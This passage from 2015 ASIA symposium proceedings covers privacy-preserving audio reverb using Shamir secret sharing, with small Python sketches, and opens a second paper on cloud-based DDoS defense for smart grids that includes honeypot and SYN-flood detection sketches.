Such a scheme is called a (K,N) threshold scheme, where 2 ≤ K ≤ N, N is the number of shares, and K is the least number of shares required to reconstruct the secret. To share a secret S among N participants, a polynomial function f(x) of degree K − 1 is constructed using K − 1 random coefficients a1, a2, ..., aK−1 in a finite field GF(q), where a0 is S and q is a prime number > a0.

f(x) = (a0 + a1·x + · · · + aK−1·x^(K−1)) mod q    (1)

Any K out of N shares can reconstruct the secret by using Lagrange interpolation to recover the polynomial f(x); the secret is obtained at f(0), i.e., f(0) = a0 = S.

f(x) = Σ_{j=1}^{K} yj · Π_{i=1, i≠j}^{K} (x − xi)/(xj − xi) mod q    (2)

A. Homomorphic Encryption

A cryptosystem is homomorphic if computation on its ciphertext yields an encrypted result which, when decrypted, matches the result of the same computation on the plaintext. SSS is homomorphic under addition and multiplication. Let m1 and m2 belong to the plaintext space of some cryptosystem, and let E(·) and D(·) denote the encryption and decryption functions respectively. Then SSS satisfies the conditions below:

D(E(m1) + E(m2)) = m1 + m2    (3)

D(E(m1) × E(m2)) = m1 × m2    (4)

Examples of additively homomorphic cryptosystems are Paillier [12] and Benaloh [13]; examples of multiplicatively homomorphic cryptosystems are RSA [14] and ElGamal [15].
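As an illustration of the (K,N) sharing of Equations (1)–(2) and the additive homomorphism of Equation (3), here is a minimal Python sketch. The paper's experiments used MATLAB; the prime q, the secrets, and the threshold values below are arbitrary choices for this example.

```python
import random

Q = 2**31 - 1  # a prime modulus; any prime larger than the secret works

def make_shares(secret, k, n, q=Q):
    """Create n shares of `secret` with threshold k (Eq. 1)."""
    coeffs = [secret] + [random.randrange(q) for _ in range(k - 1)]
    # Share i is the point (i, f(i)) on the degree-(k-1) polynomial.
    return [(x, sum(c * pow(x, e, q) for e, c in enumerate(coeffs)) % q)
            for x in range(1, n + 1)]

def reconstruct(shares, q=Q):
    """Lagrange interpolation evaluated at x = 0 (Eq. 2)."""
    secret = 0
    for j, (xj, yj) in enumerate(shares):
        num, den = 1, 1
        for i, (xi, _) in enumerate(shares):
            if i != j:
                num = num * (-xi) % q
                den = den * (xj - xi) % q
        # pow(den, q-2, q) is the modular inverse of den (q is prime).
        secret = (secret + yj * num * pow(den, q - 2, q)) % q
    return secret

# Additive homomorphism (Eq. 3): adding shares pointwise adds the secrets.
s1 = make_shares(1234, k=2, n=3)
s2 = make_shares(4321, k=2, n=3)
summed = [(x1, (y1 + y2) % Q) for (x1, y1), (_, y2) in zip(s1, s2)]
assert reconstruct(summed[:2]) == 1234 + 4321
```

Note that multiplying shares pointwise (Eq. 4) also multiplies the secrets, but raises the polynomial degree, so more shares are needed for reconstruction after a multiplication.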

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 40

III. ARTIFICIAL REVERBERATION TECHNIQUES

There are many techniques for applying reverb effects to audio. The most common techniques for artificially adding reverb are:
1) Filter banks and delay lines: this approach connects filters (comb, all-pass, lowpass) in parallel and in series and adjusts their parameters to produce the desired reverb effect, e.g., Schroeder's reverberator [16] and Moorer's reverberator [17].
2) Convolution reverb: an acoustic space is a Linear Time-Invariant (LTI) system, and like any LTI system its impulse response can be modeled and convolved with an audio signal to reproduce the effects of that space. Modeling the impulse response depends on the application scenario and the needs of the designer, and is beyond the scope of this paper. Some examples of modeled impulse responses are room, concert hall, cathedral, bottle hall, conic long echo hall, deep space, etc. In this work, we apply this approach to artificially add a reverb effect to an audio secret in ED. Let h[n] be the modeled impulse response and x[n] the audio signal. Then the discrete convolution below yields the reverb-effected signal y[n].

y[n] = x[n] ∗ h[n] = Σ_{k=−∞}^{∞} x[k]·h[n − k]    (5)
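A plaintext-domain sketch of Equation (5); the short "dry" signal and decaying impulse response below are toy values chosen for illustration:

```python
def convolve(x, h):
    """Discrete convolution (Eq. 5): y[n] = sum_k x[k] * h[n - k]."""
    y = [0.0] * (len(x) + len(h) - 1)
    for n in range(len(y)):
        for k in range(len(x)):
            if 0 <= n - k < len(h):
                y[n] += x[k] * h[n - k]
    return y

# A dry click convolved with a decaying impulse response gains a "tail".
x = [1.0, 0.5]
h = [1.0, 0.0, 0.6]      # direct path plus one delayed, attenuated reflection
print(convolve(x, h))     # [1.0, 0.5, 0.6, 0.3]
```

The output is longer than the input by len(h) − 1 samples, which is the reverb tail added by the impulse response.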

IV. PROPOSED WORK

The audio secret to be reverb-effected is encrypted by creating shares with the SSS (K,N) threshold scheme on the client's system. The client then uploads each of the N shares to N different non-colluding CDCs. Each CDC applies the reverberation effect to its hosted share by convolving it with the desired impulse response. Reverb impulse responses are public signals in plaintext; the client does not need to transmit or upload impulse responses to the CDCs, since the CSP can obtain a library of impulse responses. An authorized user then reconstructs the reverb-effected secret by combining at least K out of the N processed shares.

Signal processing operations often involve real-valued signal amplitudes; however, using real numbers in a cryptosystem means forgoing the modular prime operation, which in the case of SSS degrades security. Therefore, we have to preprocess the real-valued samples of the audio secret into positive integer values. Steps 1 and 2 below preprocess the original signal before shares are created. The following steps detail our method in ED.

Step 1: Scale the real-valued signal amplitudes by a constant factor 10^d, where d is an integer. The roundoff error is bounded by:

−(1/2)·10^(1−d) ≤ ε ≤ (1/2)·10^(1−d)    (6)

where ε is the rounding error and d is the rounding precision.

Step 2: Shift the scaled signal from Step 1 to the first quadrant by a constant additive shift γ to avoid negative numbers.

A′ = ((A + ε) × 10^d) + γ    (7)

Step 3: Create N shares (S1, S2, ..., SN ∈ S) of the preprocessed signal A′ using Equation (1) of SSS in the finite field of q, where q > max(A′). Upload the N shares to N non-colluding CDCs.

Step 4: Convolve each share on its CDC. The modeled impulse response is real-valued, and some of its samples may be negative, which can cause errors during convolution reverberation. To avoid such errors, perform the following:
1) Scale the impulse response h by 10^t, i.e., h′ = h × 10^t, where t is an integer.
2) Modify Equation (5) by adding a constant additive shift β to avoid negative samples: β = ⌈q/2⌉ if h′ has a negative sample, else β = 0, where ⌈·⌉ is the ceiling function.
Convolve each share (S1, S2, ..., SN ∈ S) with h′ using Equation (8) to obtain (S′1, S′2, ..., S′N ∈ S′).

S′i[n] = ((Si[n] ∗ h′[n]) + β) mod q
       = ((Σ_{k=0}^{L−1} Si[k]·h′[n − k]) + β) mod q,  i ∈ {1, 2, ..., N}    (8)

where L is the number of samples in each share.

Step 5: An authorized user can reconstruct the reverb-effected secret by combining K processed shares from any of the N CDCs using Lagrange interpolation, Equation (2).

Step 6: Postprocess the reconstructed secret to reverse the preprocessing done in the steps above: 1) subtract the additive shift β and divide by the scale factor of h′, which is 10^t; 2) subtract the additive shift γ and divide by the scale factor 10^d, reversing Equations (7) and (6) respectively.
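The six steps above can be sketched end to end. This is a minimal Python illustration, not the authors' MATLAB implementation; the modulus, scale factors, toy audio, and impulse response are arbitrary choices, and the additive shift γ is omitted by keeping the toy secret non-negative.

```python
import random

Q = 2_147_483_647  # prime modulus; must exceed every preprocessed sample

def shares_of(value, k, n):
    """SSS shares (Eq. 1) of one integer sample, keyed by x-coordinate."""
    coeffs = [value] + [random.randrange(Q) for _ in range(k - 1)]
    return {x: sum(c * pow(x, e, Q) for e, c in enumerate(coeffs)) % Q
            for x in range(1, n + 1)}

def reconstruct(points):
    """Lagrange interpolation at x = 0 (Eq. 2)."""
    out = 0
    for xj, yj in points.items():
        num = den = 1
        for xi in points:
            if xi != xj:
                num = num * (-xi) % Q
                den = den * (xj - xi) % Q
        out = (out + yj * num * pow(den, Q - 2, Q)) % Q
    return out

# Client side (Steps 1-3). For simplicity the toy secret is non-negative, so
# the additive shift gamma is omitted here (the full scheme adds gamma > 0).
d, t, K, N = 2, 2, 2, 3
audio = [0.25, 0.5, 0.75]                       # toy plaintext audio secret
A = [round(a * 10**d) for a in audio]           # Step 1: integerize
streams = {x: [] for x in range(1, N + 1)}      # one share stream per CDC
for sample in A:                                # Step 3: share sample-wise
    for x, y in shares_of(sample, K, N).items():
        streams[x].append(y)

# CDC side (Step 4): convolve each share stream with h' modulo Q.
h = [1.0, 0.5]                                  # toy impulse response, >= 0
hp = [round(v * 10**t) for v in h]              # scaled h'; beta = 0 here
L, M = len(A), len(hp)
for x in streams:
    s = streams[x]
    streams[x] = [sum(s[k] * hp[n - k] for k in range(L)
                      if 0 <= n - k < M) % Q for n in range(L + M - 1)]

# User side (Steps 5-6): reconstruct from K streams, rescale by 10^(d + t).
y = [reconstruct({x: streams[x][n] for x in (1, 2)}) / 10**(d + t)
     for n in range(L + M - 1)]
expected = [0.25, 0.625, 1.0, 0.375]            # plaintext audio * h
assert all(abs(a - b) < 1e-9 for a, b in zip(y, expected))
```

Because convolution with integer taps is a linear combination of shares, each convolved share stream still interpolates, at x = 0, to the convolution of the underlying secret, which is why reconstruction after ED processing matches plaintext processing.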

A. Data Overhead

Our proposed scheme introduces some data overhead due to the preprocessing steps performed before creating shares. This overhead is the number of bits needed to represent the maximum preprocessed audio sample, which is the same as the transmission overhead of each share to a CDC. Since shares are generated in a finite field bounded by the prime modulus q, the data overhead to transmit a share to each CDC is also bounded by the number of bits representing q.
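As a rough sizing sketch of this overhead (the sample width and scale factor below are hypothetical choices, not figures from the paper):

```python
import math

def share_bits(q):
    """Bits per transmitted share sample: values are reduced mod q."""
    return math.ceil(math.log2(q))

# Hypothetical sizing: 16-bit samples (max 65535) scaled by 10^2 need a
# prime q just above 65535 * 100 = 6,553,500, so each share sample costs
# about 23 bits in transit instead of the original 16.
assert share_bits(65535 * 100) == 23
```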

B. Security Analysis

The proposed method is based on the SSS (K,N) threshold scheme, which is proven to be information-theoretically secure [18]. Since share generation is bounded by q, samples of each share lie in the set {0, 1, 2, ..., q − 1} and, by Equation (1), each sample of a share is produced by a distinct random polynomial. An adversary would therefore have to guess a secret sample with success probability 1/q, making it highly unlikely to infer a secret sample from its share.

Audio signals, by nature, have correlated adjacent samples. This correlation reduces the entropy (degree of uncertainty) of the entire signal; i.e., a sample can be predicted from


TABLE II: Data set

Test File (.wav) | Length (secs) | Bits/Sample | Sampling Frequency (Hz)
audio1 | 2 | 16 | 16000
audio2 | 43 | 16 | 8000
audio3 | 13 | 16 | 11025
audio4 | 14 | 8 | 44100
audio5 | 4 | 8 | 8000
audio6 | 2 | 32 | 8000

TABLE III: Average Processing Time (ms)

Test file | Share Creation | ED Processing | Reverb Effected Secret Reconstruction
audio1 | 205.18 | 97.77 | 17.81
audio2 | 1620.27 | 631.44 | 80.32
audio3 | 747.46 | 276.57 | 39.58
audio4 | 2802.95 | 1068.85 | 115.98
audio5 | 219.06 | 73.21 | 18.64
audio6 | 149.20 | 44.26 | 15.02

its adjacent samples, as in Linear Predictive Coding (LPC). However, the use of random coefficients as a blinding factor in Equation (1) when generating shares eliminates this correlation. Thus, individual shares do not reveal information about the secret audio. In future work we hope to examine the information-theoretic security implications of our scheme with respect to the preprocessing steps.

V. EXPERIMENTAL RESULTS

Table II details the test audio files, obtained from [19], used to evaluate the proposed method. We test our method with a modeled impulse response [20] of the acoustic environment of a living room; that is, we add the effects of a living room to our audio test files in ED. In the (K,N) threshold SSS scheme, we set K = 2 and N = 3, meaning we created three shares of the audio secret such that at least two shares are required to reconstruct the reverb-effected audio secret.

We implemented the proposed method using MATLAB14 on a 2.53 GHz i5 CPU with 4 GB RAM. Table III details the processing times for creating secret shares, applying the reverberation effect in the encrypted domain, and reconstructing the audio secret. The table suggests that reconstructing the secret is relatively less costly than creating shares and ED processing. Our method operates on a per-sample basis; as a result, the processing time is directly proportional to the audio bit rate, which depends on the sampling frequency and the number of bits per sample. Therefore, the greater the length of the signal, the greater the complexity. This is evident for audio2.wav and audio4.wav, which have the greatest processing times.

Fig. 1 shows similarity scores between the PD and ED reverb-effected signals, computed using Pearson's correlation. The results suggest that the reverb-effected signal produced by our method correlates about 99.99% with normal PD processing. Thus, our method yields practically identical results to PD processing while maintaining security and privacy. The 0.01% difference is accounted for by the rounding performed during the preprocessing of both the original audio secret A and the impulse response h. We hope to optimize the solution in the future to further reduce round-off error.
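Pearson's correlation, as used for the similarity scores, can be computed directly; the signals below are toy values with a tiny synthetic round-off perturbation, not the paper's data.

```python
import math

def pearson(a, b):
    """Pearson correlation coefficient between two equal-length signals."""
    n = len(a)
    ma, mb = sum(a) / n, sum(b) / n
    cov = sum((x - ma) * (y - mb) for x, y in zip(a, b))
    sa = math.sqrt(sum((x - ma) ** 2 for x in a))
    sb = math.sqrt(sum((y - mb) ** 2 for y in b))
    return cov / (sa * sb)

pd = [0.25, 0.625, 1.0, 0.375]                       # plaintext-domain output
ed = [v + e for v, e in zip(pd, [1e-5, -2e-5, 1.5e-5, -5e-6])]  # ED + noise
assert pearson(pd, ed) > 0.999                       # near-perfect similarity
```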

Fig. 1: Similarity Score between PD and ED processing


Fig. 2: Modeled room impulse response

Fig. 3: Time domain plots of audio1.wav: (a) audio secret, (b) 1st share, (c) reconstructed reverb effected audio


Time domain plots of audio1.wav are shown in Fig. 3: the audio secret, one of its shares, and the reverb-effected reconstructed secret. The time series reveals that 1) the share resembles noise and is likely to have equal power across all frequencies, and 2) the amplitude of the reverb-effected reconstructed secret shows some low-amplitude regions compared to the audio secret. This is a result of the delay and decay effect of the impulse response shown in Fig. 2, and verifies that the audio secret has been reverb-effected.

VI. CONCLUSION

The use of cloud computing continues to grow. In order for governments and companies to entrust computation of their data to Cloud Service Providers (CSPs), security issues must be given close attention. Although there are policies governing the operations of CSPs, these are not enough to guarantee the security and privacy of data. Researchers in mathematics, computer science, and engineering are currently developing encryption protocols that make computational tasks possible in the Encrypted Domain (ED); only then will CSP services be fully embraced without fear of security or privacy issues. As a contribution toward this goal, we have proposed in this work a secure artificial addition of reverb effect to an audio secret over the cloud, using the (K,N) Shamir's Secret Sharing (SSS) scheme as our cryptosystem. Our method implements convolution reverb and can be applied to any reverb impulse response and audio secret in ED over the cloud. Experimental results show that our proposed method is efficient and yields results similar to Plaintext Domain (PD) processing.

REFERENCES

[1] GPSC, University of Vigo, "Signal processing in encrypted domain," 2014. [Online]. Available: http://webs.uvigo.es/gpscuvigo/?q=content/signal-processing-encrypted-domain

[2] M. Barni, P. Failla, V. Kolesnikov, R. Lazzeretti, A.-R. Sadeghi, and T. Schneider, "Secure evaluation of private linear branching programs with medical applications," in Proceedings of the 14th European Symposium on Research in Computer Security (ESORICS), ser. LNCS, vol. 5789. Springer, 2009, pp. 424–439.

[3] A. Piva, T. Bianchi, and A. D. Rosa, "Secure client-side ST-DM watermark embedding," IEEE Transactions on Information Forensics and Security, vol. 5, no. 1, pp. 13–26, 2010.

[4] W. Lu, A. Swaminathan, A. L. Varna, and M. Wu, "Enabling search over encrypted multimedia databases," in Proceedings of the International Society for Optics and Photonics, Media Forensics and Security, ser. SPIE, vol. 7254, 2009.

[5] M. Malik, M. Ghazi, and R. Ali, "Privacy preserving data mining techniques: Current scenario and future prospects," in Third International Conference on Computer and Communication Technology (ICCCT). IEEE, 2012, pp. 26–32.

[6] H. Sohn, K. N. Plataniotis, and Y. M. Ro, "Privacy-preserving watch list screening in video surveillance system," in Advances in Multimedia Information Processing, ser. LNCS, vol. 6297. Springer, 2010, pp. 622–632.

[7] L. Khan, M. Baig, and A. M. Youssef, "Speaker recognition from encrypted VoIP communications," Digital Investigation, vol. 7. Elsevier, 2010, pp. 65–73.

[8] M. Backes, G. Doychev, M. Durmuth, and B. Kopf, "Speaker recognition in encrypted voice streams," in Computer Security - ESORICS, ser. LNCS, vol. 6345. Springer, 2010, pp. 508–523.

[9] M. Pathak and B. Raj, "Privacy-preserving speaker verification and identification using Gaussian mixture models," IEEE Transactions on Audio, Speech, and Language Processing, vol. 21, pp. 397–406, February 2013.

[10] M. V. S. Shashanka and P. Smaragdis, "Secure sound classification: Gaussian mixture models," in IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP), vol. 3. IEEE, 2006.

[11] A. Shamir, "How to share a secret," Communications of the ACM, vol. 22, pp. 612–613, November 1979.

[12] P. Paillier, "Public-key cryptosystems based on composite degree residuosity classes," in Advances in Cryptology - EUROCRYPT '99, ser. Lecture Notes in Computer Science, vol. 1592. Springer, 1999, pp. 223–238.

[13] J. Benaloh, "Verifiable secret-ballot elections," Ph.D. dissertation, Yale University, New Haven, CT, USA, 1988.

[14] R. L. Rivest, A. Shamir, and L. Adleman, "A method for obtaining digital signatures and public-key cryptosystems," Communications of the ACM, vol. 21, no. 2, pp. 120–126, February 1978.

[15] T. ElGamal, "A public key cryptosystem and a signature scheme based on discrete logarithms," in Advances in Cryptology - CRYPTO '84, ser. Lecture Notes in Computer Science, vol. 196. Springer, 1985, pp. 10–18.

[16] M. R. Schroeder, "Natural sounding artificial reverberation," Journal of the Audio Engineering Society, vol. 10, 1962, pp. 219–223.

[17] J. A. Moorer, "About this reverberation business," Computer Music Journal, vol. 3, 1978, pp. 13–28.

[18] W. Stallings, Cryptography and Network Security: Principles and Practice, 5th ed. New York, NY: Prentice Hall, 2010.

[19] SVV Media Audio Database, 2008. [Online]. Available: http://download.wavetlan.com/SVV/Media/HTTP/http-wav.htm

[20] DREAMS ITN, "Room impulse responses," 2013. [Online]. Available: http://www.dreams-itn.eu/index.php/dissemination/science-blogs/24-rir-databases


Using Features of Cloud Computing to Defend Smart Grid against DDoS Attacks

Anthony Califano, Ersin Dincelli, and Sanjay Goel
University at Albany, State University of New York
Albany, New York
Email: {acalifano, edincelli, goel}@albany.edu

Abstract—Smart Grid (SG) poses operational and business challenges for energy suppliers and utility companies that are readily met by Cloud Computing (CC). Given the distributed nature of SG and CC, it is inevitable that the two technologies will become integrated. In this paper we discuss the risks and opportunities that CC presents to energy suppliers and utility companies, and consider which inherent attributes of CC may be leveraged to improve Distributed Denial of Service (DDoS) defense for SG. An extended literature review is performed to determine which DDoS defense techniques can be enhanced by CC and used to defend the SG. We propose that, when risks are properly mitigated, the deployment of CC can be seen as an overall benefit, whose inherent attributes can be harnessed to make the SG more secure and help mitigate the threat of a crippling DDoS attack.

Keywords—Smart Grid, Cloud Computing, DDoS, Cyber Security, DDoS Defense, Critical Infrastructure

I. INTRODUCTION

The smart grid (SG) is an overlay of a communication grid on the electric grid that provides greater visibility, which can be leveraged to improve efficiency and resilience as well as to ease integration of alternative energy sources at a micro level [1]. The SG will link together our homes, electronic devices, vehicles, and businesses into a giant, intelligent network [2]. Technologies such as Smart Home technology, the Advanced Metering Infrastructure (AMI), corporate networks, SCADA, and other Industrial Control Systems (ICS) will all communicate with one another to control, distribute, and monitor electricity [3]. A fully realized SG will leverage these technologies and decentralize energy generation, maximizing the efficiency and reliability of energy generation and distribution [4].

Cloud Computing (CC) has been suggested as a viable solution for the energy industry to process and store the data collected by the AMI [5]. CC is a cost-effective computing solution with many benefits including, but not limited to, scalability, reliability, replication, device and location independence, and security [4]. Considering the adoption of CC by energy suppliers and utility companies, we explore how specific attributes of CC could be leveraged to proactively protect the SG against one of the most devastating types of cyber-attacks, the distributed denial-of-service (DDoS) attack.

As a critical infrastructure, the SG must remain functional under all circumstances [6]. The diversity and complexity of its communication networks and automation systems make the SG vulnerable to cyber-attacks such as DDoS [6]. Malicious efforts to disrupt communication between SG components could result in major negative effects such as delays, loss of service, and even physical damage [7], [8]. New strategies are being developed to help protect the SG infrastructure and data against malicious intent [9], and given how detailed and sensitive this type of data can be [10], countermeasures to protect security and privacy are of paramount concern [8].

DDoS attacks are performed with the intention of interrupting or suspending the communication capability [11], [12] of any networked device or service by saturating the memory or bandwidth of the target [7]. They have been recognized as a significant concern for the SG [13], since the level of technical prowess needed to conduct them is low and they are easy to implement. In fact, the number of DDoS attacks has begun to rise, and their severity has increased, exceeding traffic volumes of 100 Gbps [14].

There are multiple DDoS defense techniques that, when coupled with a quick defensive response [15] and easily scalable computing resources, can be effective at mitigating the severity of attacks. We discuss the attributes of CC that could be used to enhance these techniques in the event of a DDoS attack on the SG. Based on an extended review of the literature, we propose that CC may be leveraged to enhance DDoS defense for the SG and its supporting infrastructure.

The paper is organized as follows: Section II describes the CC challenges and opportunities for SG and presents the main potential risks and benefits of integrating CC into SG; Section III discusses how a DDoS attack could be performed against the SG and how CC can enhance existing DDoS defense techniques; Section IV presents concluding remarks.

II. CLOUD COMPUTING CHALLENGES AND OPPORTUNITIES FOR SMART GRID

Energy suppliers will have to contend with a fundamental shift away from a model of centralized electricity generation at large fossil-fuel-burning or nuclear power plants, to one in which generation occurs in smaller, widely distributed pockets of renewable energy sources [16]. Combined with enhanced communication between customers, utility companies, and energy suppliers, the SG will be able to react to shifts in electricity demand in real time. The SG is a superposition of a communication grid over the power grid in which fine-grained usage data and operational sensor data are collected from across the grid and processed to improve operational efficiency, resilience, and reliability. As a result of this new paradigm,

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 44

energy suppliers are presented with many new challenges [12], such as how to deal with the exorbitant amount of data collected from advanced metering technology, how to track many distributed sources of energy generation, and the related privacy and security issues for each [17].

There are inherent risks associated with the integration of CC into the SG, because CC was not originally designed for high-assurance applications where consistency and security of data are the primary concern [18]. In the event of a system failure or communications interruption, Cloud Service Providers (CSPs) need to ensure that data integrity is maintained and lost data is recoverable. Issues with the latency of CC applications and services, such as the variability and degree of latency, need to be mitigated [19]. CSPs need to define the location of data in the cloud while ensuring that encryption, data segmentation, and granular access control are enforced [20]. Strong security measures and auditing controls need to be defined in service level agreements to ensure that data reliability, confidentiality, and auditing capabilities are preserved [4]. Most importantly, CC relies on the Internet, a technology that is inherently unreliable and prone to nefarious activity [6]. If CC is to be used for SG, it may be necessary to achieve greater levels of security and reliability within the current Internet infrastructure.

Integrating CC into SG is a sensible business model for energy suppliers grappling with the storage and processing capabilities required of a fully realized SG [19], [21], [22]. CC offers energy suppliers and utility companies opportunities such as: operating their services at lower cost by taking advantage of economies of scale; automation available as a service; real-time response for control signals and demand management; faster deployment of disaster recovery and security implementations through virtualization [23]; and scalable resources that can adapt to fluctuations in demand. Most importantly, CC provides energy suppliers and utility companies the ability to outsource resource-intensive tasks to the cloud [5].

These benefits, coupled with a hybrid deployment mixing community and private CC, could achieve strong security and privacy standards for SG [24], [4]. Additionally, the deployment of CC would give energy suppliers and utility companies access to computing resources that could lead to new or enhanced services, the creation of new business models, and operating efficiencies. Given this, it is prudent to consider how some of the inherent attributes of CC can help mitigate the crippling effects of a DDoS attack made against a fully realized SG. Several inherent CC attributes make it suitable for the SG.

First, CC provides a highly agile system that can quickly adapt to fluctuations in data storage or processing needs. As a result, additional services or new features implemented by energy suppliers or utility companies can be deployed without disrupting existing services [4]. Second, with a robust network, the effects of a natural disaster can be mitigated by shifting processing and networking needs to other, unaffected portions of a fully realized SG [3]. Spreading out portions of data, or backing up entire data sets in multiple locations, increases the ability of the system to recover from disruptive events [3]. Third, even though geographically diverse, the CC would act as a centralized processing infrastructure, achieving higher

TABLE I. MAIN POTENTIAL RISKS AND BENEFITS OF INTEGRATING CLOUD COMPUTING INTO SMART GRID

CC Attribute | Potential Risk | Potential Benefit
Agility & redundancy | Lack of efficiency in the ability to scale up and down to match demand. Costs associated with latency. | Ability to adapt to fluctuations and resource-intensive tasks. Low storage costs due to economies of scale.
Device & location independence | Consistency of the data: connectivity, latency, and performance issues. | Resilience. Low operating costs. Location / geographic independence.
Real-time response & elastic performance | Consistency of the data: latency, performance, and data auditing issues; billing errors. | Quick response to fluctuations in energy demand, ensuring proper electricity distribution/delivery.
Self-healing | Causes of errors / malfunctions may remain unknown. Self-repair may lead to system inefficiencies or data inaccuracy. | Would greatly enhance the robustness and endurance of SG systems.
Virtualization & automation services | Data security: hypervisor and VM vulnerabilities and potential misconfigurations. | Faster response time, disaster recovery, and deployment of security implementations.

utilization than individual energy suppliers doing their own data processing [19]. The elasticity of computing resources would help customers deal with unexpected increases in data load; when load levels return to normal, the extra computing power can be retired [22]. Fourth, critical CC systems can be designed to self-heal, with the capability to detect, diagnose, and react to infrastructure or software disruptions [25]. Self-healing systems can respond to environmental or operational disruptions in real time, eliminating or greatly reducing the need for human intervention. Fifth, when maintenance is required on cyber-physical systems, virtualization would allow the SG systems to operate without service interruptions while [26] installing new patches, applying secure configurations, or performing security upgrades. Utilizing virtual machines (VMs) on SG systems becomes less risky because the installation of special software is not required to run applications or perform computations. Table I summarizes the potential risks and benefits of integrating CC into SG.

III. HOW CLOUD COMPUTING CAN ENHANCE EXISTING DDOS DEFENSE TECHNIQUES

The physical size and complexity of the SG increase its vulnerability to DDoS attacks. An attack could be performed against many of the grid components, including but not limited to smart meters, networking devices, communication links, energy supplier servers, and infrastructure control systems [2]. A DDoS attack against a portion of the SG infrastructure would disrupt the communications network, causing disruption to automated or remote services, energy usage forecasting, or electricity delivery and distribution [2]. This could lead to a leak of customer data, wide-scale blackouts, and the destruction of the cyber-physical infrastructure [12]. Additionally, there are financial and legal implications for energy suppliers in the event that customer data is lost or stolen, or billing data is falsified [12].

DDoS attacks can affect every layer of the OSI model, but mitigation of large-scale DDoS attacks occurs over layers 3, 4, and 7. Our discussion focuses on attacks performed over layers 4 and 7, because of their recent rise in popularity and the difficulty of defending against and mitigating their

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 45

Fig. 1. DDoS Attack Risk over OSI Layer 7 from Malware Infected SG Connected Devices

effects. A DDoS attack originating from malware-infected SG devices that is executed over these layers could have major impacts on the operations of the SG [6]. Figure 1 illustrates how a DDoS attack could be executed over the SG through malware-infected smart appliances over OSI layer 7 (the application layer), targeting the corporate networks and industrial control systems of energy suppliers or utility companies.

There are many different techniques to defend against DDoS attacks [27], but our analysis is limited to the DDoS defense techniques that can be enhanced by utilizing the inherent attributes of CC. We also assume that CC is a fully integrated component of the SG, to the extent that CC is not just being used for data storage, but also for data processing, virtualizing software for energy suppliers, utility companies, and consumers, and integrating corporate networks and industrial control systems. [28] categorizes DDoS defense techniques into four types: 1) attack prevention, 2) attack detection, 3) attack source identification, and 4) attack reaction.

A. Attack Prevention Defense Mechanisms

Attack prevention mechanisms attempt to stop DDoS attacks before they can reach their target, mostly through the use of a variety of packet filtering techniques [11], [29]. Methods such as ingress/egress filtering and router-based packet filtering are effective for small-scale attacks, but in large, widely distributed DDoS attacks, they are ineffective even when the source of the attack is known [28]. While the effectiveness of filtering techniques is questionable, especially for OSI layer 7 attacks, energy suppliers and utility companies could utilize honeypots and honeynets to gain intelligence on potential DDoS attacks. Honeypots are systems configured with limited security to trick would-be attackers into targeting them instead of the actual system [30]. Honeypots could take advantage of CC's ability to virtualize servers and duplicate services [31]. Traditionally, high-interaction honeypots have been expensive to maintain, especially when virtualization is unavailable. An array of honeypots with different configurations, built to detect vulnerabilities from malware, replication vectors, and databases, could be implemented cheaply, be less resource intensive, and be restored more quickly if compromised. In conjunction with a robust network intrusion detection system (IDS), honeypots could be actively distributed across VMs to mitigate computational overload, and play an integral role in a coordinated DDoS defense strategy [31], [26].
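
The virtualized-honeypot idea can be illustrated with a minimal sketch. The following low-interaction honeypot (a hypothetical illustration, not an implementation from the cited works) accepts a single TCP connection, records the peer address and first payload bytes, and closes; a CSP could cheaply stamp out many such VMs with varied configurations.

```python
import socket
import threading

class Honeypot:
    """Minimal low-interaction honeypot sketch: log who connects and
    what they send. Port 0 asks the OS for an ephemeral port."""

    def __init__(self, host="127.0.0.1", port=0):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind((host, port))
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]
        self.log = []  # (peer_ip, payload) tuples for later IDS analysis

    def serve_one(self):
        # Accept one probe, record it, and drop the connection.
        conn, addr = self.sock.accept()
        data = conn.recv(1024)
        self.log.append((addr[0], data))
        conn.close()
```

Each recorded (ip, payload) entry could then be handed to the IDS mentioned above, or used to reconfigure the honeypot array.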

B. Attack Detection

Attack detection techniques need to be able to detect attacks in real time as well as post-incident. Identification of DoS attacks is primarily based on network data analysis (e.g., connection requests, packet headers) to detect anomalies in traffic patterns and imbalances in traffic rates [32]. The detection system must be able to differentiate between legitimate and malicious traffic, keeping false-positive rates low so that legitimate users are not affected. In addition, these methods should have good system coverage and a short detection time [33]. Additionally, if authentication schemes for SG-attached devices are compromised, attack source identification schemes may prove very useful at detecting malicious activity [16].

DoS-Attack-Specific Detection is used to detect attacks that exploit the Transmission Control Protocol (TCP) over OSI layer 4 (e.g., SYN flooding). DoS-Attack-Specific Detection methods attempt to identify when incoming traffic is not proportional to outgoing traffic, the traffic is statistically unstable, or the attack flow does not have periodic behavior [34]. These types of detection techniques have had limited success against DDoS attacks [28], because each compromised host can closely mimic a legitimate user, since there is no need to manipulate the traffic pattern of a single host. Assuming that the inherent features of the attack can be detected early, elastic computing resources could strengthen SYN flood defense mechanisms [35], and theoretically be used to instigate an intentional increase in attack strength. The geographic diversity of cloud resources could be leveraged, using data from both first-mile and last-mile routers throughout a CSP's network to pinpoint the attack source and aid ingress or egress filtering. This, coupled with redundant resources able to perform packet state analysis, would decrease the amount of time needed to shut out illegitimate traffic [36].
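
The in/out proportionality check that DoS-Attack-Specific Detection relies on can be sketched as follows; the ratio threshold and minimum sample size are illustrative assumptions, not values from the cited works.

```python
class SynFloodDetector:
    """Sketch of traffic-imbalance detection: healthy TCP traffic keeps
    incoming SYNs roughly proportional to the SYN-ACKs the server
    manages to answer; a large imbalance suggests half-open
    connections left by a SYN flood."""

    def __init__(self, max_ratio=3.0, min_syns=20):
        self.max_ratio = max_ratio  # assumed alarm threshold
        self.min_syns = min_syns    # ignore tiny samples

    def is_attack(self, syn_count, synack_count):
        if syn_count < self.min_syns:
            return False
        return syn_count / max(synack_count, 1) > self.max_ratio
```

In a cloud deployment, the per-window counters would be collected from first-mile and last-mile routers rather than a single host.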

Anomaly-Based Detection aims at detecting irregularities



